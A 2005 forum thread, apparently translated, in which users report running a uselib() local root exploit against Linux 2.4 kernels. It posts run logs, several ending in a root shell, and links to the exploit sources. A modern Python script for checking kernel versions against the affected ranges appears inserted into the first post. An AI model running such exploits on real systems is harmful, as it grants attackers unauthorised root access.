[ Shatterhand @ 28.01.2005. 17:16 ] @
Quote:
Modified uselib() local exploit for the Linux kernel series. This version has been modified to also work on SMP kernels. Linux kernel versions 2.4 up to and including 2.4.29-pre3, 2.6 up to and including 2.6.10 are affected.


As I expected, the first modified version has come out.
Here's a test on my box (Slackware 10, kernel 2.4.26):

shatter@fearless:~$ ./uselib

[+] SLAB cleanup
child 1 VMAs 47017
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xcfc00000 - 0xdf61f000
Wait... /
[+] race won maps=48908
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xd0acd000
[+] gate modified ( 0xffec9419 0x0804ec00 )
[+] exploited, uid=0

sh-2.05b#

Same result on one more 2.4.26 (unpatched).

http://www.packetstormsecurity.org/0501-exploits/uselib24.c
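The affected ranges quoted at the top of this post (2.4 up to and including 2.4.29-pre3, 2.6 up to and including 2.6.10) can be checked mechanically against the release field of `uname -a`, which is what a defender auditing a fleet of boxes would want before anything else. The script below is an added example and is not part of this thread or of the exploit source; the function names, the ordering rule that puts `-pre`/`-rc` tags before the final release of the same number, and the two `example` host lines are my own assumptions, while the `plamicak` and `s1` lines are copied from posts further down in the thread. It judges by version string only, so a vendor kernel that backports the fix or carries hardening patches will still show an affected number and be flagged.

```python
import re

# Affected ranges as stated in the advisory text quoted above:
# 2.4 up to and including 2.4.29-pre3, and 2.6 up to and including 2.6.10.
# A "pre"/"rc" tag sorts before the final release of the same number, so
# 2.4.29-pre3 becomes stage 0 and a plain 2.4.29 becomes stage 2 (assumption).
STAGE_ORDER = {"pre": 0, "rc": 1, None: 2}

# Inclusive upper bound of the affected range for each kernel series.
AFFECTED_UPPER = {
    (2, 4): (2, 4, 29, 0, 3),   # 2.4.29-pre3
    (2, 6): (2, 6, 10, 2, 0),   # 2.6.10
}

# major.minor[.patch][-pre<N>|-rc<N>]; anything after that (e.g. "-grsec") is ignored.
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(pre|rc)(\d+))?")


def parse_kernel_version(release):
    """Turn a kernel release string (the `uname -r` field) into a sortable tuple."""
    m = VERSION_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch, stage, stage_num = m.groups()
    return (int(major), int(minor), int(patch or 0),
            STAGE_ORDER[stage], int(stage_num or 0))


def is_affected_by_uselib(release):
    """True if the version string falls inside one of the affected ranges.

    Version-based only: a vendor kernel with the fix backported still shows an
    old number and is reported as affected, so treat a True as 'needs a look'.
    """
    v = parse_kernel_version(release)
    upper = AFFECTED_UPPER.get(v[:2])
    return upper is not None and v <= upper


def release_from_uname(uname_line):
    """Extract the release field from a full `uname -a` line
    ('Linux host 2.4.22 #1 SMP ...' -> '2.4.22')."""
    parts = uname_line.split()
    if len(parts) < 3:
        raise ValueError(f"not a uname -a line: {uname_line!r}")
    return parts[2]


def triage(uname_lines):
    """Map each `uname -a` line to its affected / not-affected verdict."""
    return {line: is_affected_by_uselib(release_from_uname(line))
            for line in uname_lines}


# Sample input: the first two lines are copied from posts in this thread,
# the two "example" lines are constructed to show the boundary cases.
SAMPLE_UNAME = [
    "Linux plamicak 2.4.22 #1 SMP Thu Apr 1 13:24:31 CEST 2004 i686 unknown unknown GNU/Linux",
    "Linux s1 2.4.25-grsec #2 Mon Apr 5 14:46:51 CEST 2004 i686 i686 i386 GNU/Linux",
    "Linux example 2.4.29 #1 Sat Jan 22 10:00:00 UTC 2005 i686 unknown unknown GNU/Linux",
    "Linux example 2.6.11-rc1 #1 SMP Tue Jan 11 10:00:00 UTC 2005 i686 GNU/Linux",
]

if __name__ == "__main__":
    for line, affected in triage(SAMPLE_UNAME).items():
        print("AFFECTED    " if affected else "not affected",
              release_from_uname(line))
```

On the sample input the two thread hosts and nothing else are reported as affected; `2.4.29` final and `2.6.11-rc1` sort past their series' upper bound. In practice you would feed it `uname -a` collected from each host and follow up the flagged ones by checking the distribution's changelog, since the version number alone cannot tell a backported fix from a vulnerable kernel.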
[ axez @ 28.01.2005. 22:00 ] @
Doesn't work on a 2.6 kernel.
[ EArthquake @ 28.01.2005. 22:11 ] @
@axez
It says it only works on 2.4.

@shatterhand
How long did the race take for you?
For me it ran for about 5 minutes and failed in the end.

earthquake@numenor:~/Downloads$ ./uselib24

[+] SLAB cleanup
child 1 VMAs 124
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xd7c00000 - 0xef440000
Wait... |
[+] race won maps=221
expanded VMA (0xbfffc000-0xffffe000)
[-] FAILED: find LDT (Cannot allocate memory)
CRITICAL, entering endless loop

[1]+ Stopped(SIGSTOP) ./uselib24

[ Shatterhand @ 29.01.2005. 13:07 ] @
I tried it several times on mine to see what results it gives.
It usually exploits successfully after a couple of seconds, but sometimes when the load is above 1.5:
[-] FAILED: try again (Cannot allocate memory)
load average: 2.97, 1.07, 0.44.
I tested it on a few more 2.4.x kernels and it worked after 2-3 attempts.
It still eats RAM... ;)

Earth, your case isn't entirely clear to me, because as far as I remember
your Slack 10 is also on 2.4.26 (unpatched), so it is exploitable..
[ _owl_ @ 29.01.2005. 15:25 ] @
On my machine something doesn't seem to work:
Code:

    child 1 VMAs 0
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc7c00000 - 0xcf7ad000
    Wait... /

And I can wait like this indefinitely.
The system is Slackware 9.1
Code:

owl@plamicak:~$ uname -a
Linux plamicak 2.4.22 #1 SMP Thu Apr 1 13:24:31 CEST 2004 i686 unknown unknown GNU/Linux

[ Shatterhand @ 29.01.2005. 16:50 ] @
Quote:
owl@plamicak:~$ uname -a
Linux plamicak 2.4.22 #1 SMP Thu Apr 1 13:24:31 CEST 2004 i686 unknown unknown GNU/Linux

"It should be also works on 2.4 SMP, but not easy. " ;)

If not with this one, your kernel is vulnerable to the expand_stack SMP race
http://www.packetstormsecurity.org/0501-exploits/stackgrow2.c (PoC)

All in all, the uselib() exploit worked on most of the kernels I tried,
unlike the previous version. I think the various versions will keep
circling around uselib() the way they once did around do_brk.
[ littleboy @ 29.01.2005. 17:04 ] @
sasa@s1(/tmp)$ ./a.out

[+] SLAB cleanup
child 1 VMAs 622
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc0400000 - 0xc047e465
Wait... |--> prepare_slab(), 255Mb

[-] FAILED: try again
Killed
sasa@s1(/tmp)$ uname -a
Linux s1 2.4.25-grsec #2 Mon Apr 5 14:46:51 CEST 2004 i686 i686 i386 GNU/Linux
sasa@(/tmp)$

Nice.
[ Mitrović Srđan @ 29.01.2005. 17:09 ] @
Code:
bash-2.05b$ ./uselib24 

[+] SLAB cleanup
    child 1 VMAs 2134
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xdf800000 - 0xfef5d000
    Wait... \
[+] race won maps=55328
    expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xe205c000
[+] gate modified ( 0xffec9419 0x0804ec00 )
[+] exploited, uid=0

sh-2.05b# id
uid=0(root) gid=0(root) 
groups=102(h4x0rz),11(floppy),17(audio),18(video),19(cdrom)


Code:
sh-2.05b# uname -a
Linux digital-phear 2.4.26 #6 Mon Jun 14 19:07:27 PDT 2004 i686 unknown unknown GNU/Linux
[ weB_KiLeR @ 30.01.2005. 08:14 ] @
Code:

Mil0s@coders:~$ ./elflbl

    child 1 VMAs 0
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc5000000 - 0xc9c16000
[-] FAILED: open lib (/dev/shm/_elf_lib not writable?) (Permission denied)
Killed

Linux rules ;)
[ Shatterhand @ 30.01.2005. 20:20 ] @
Code:
[-] FAILED: open lib (/dev/shm/_elf_lib not writable?) (Permission denied)

Miloš, what did you try there? I'm talking about the new version of the uselib() exploit where,
as far as I remember, /dev/shm was dropped, i.e. replaced with a writable location:

Code:
#define LIBNAME     "/tmp/_elf_lib"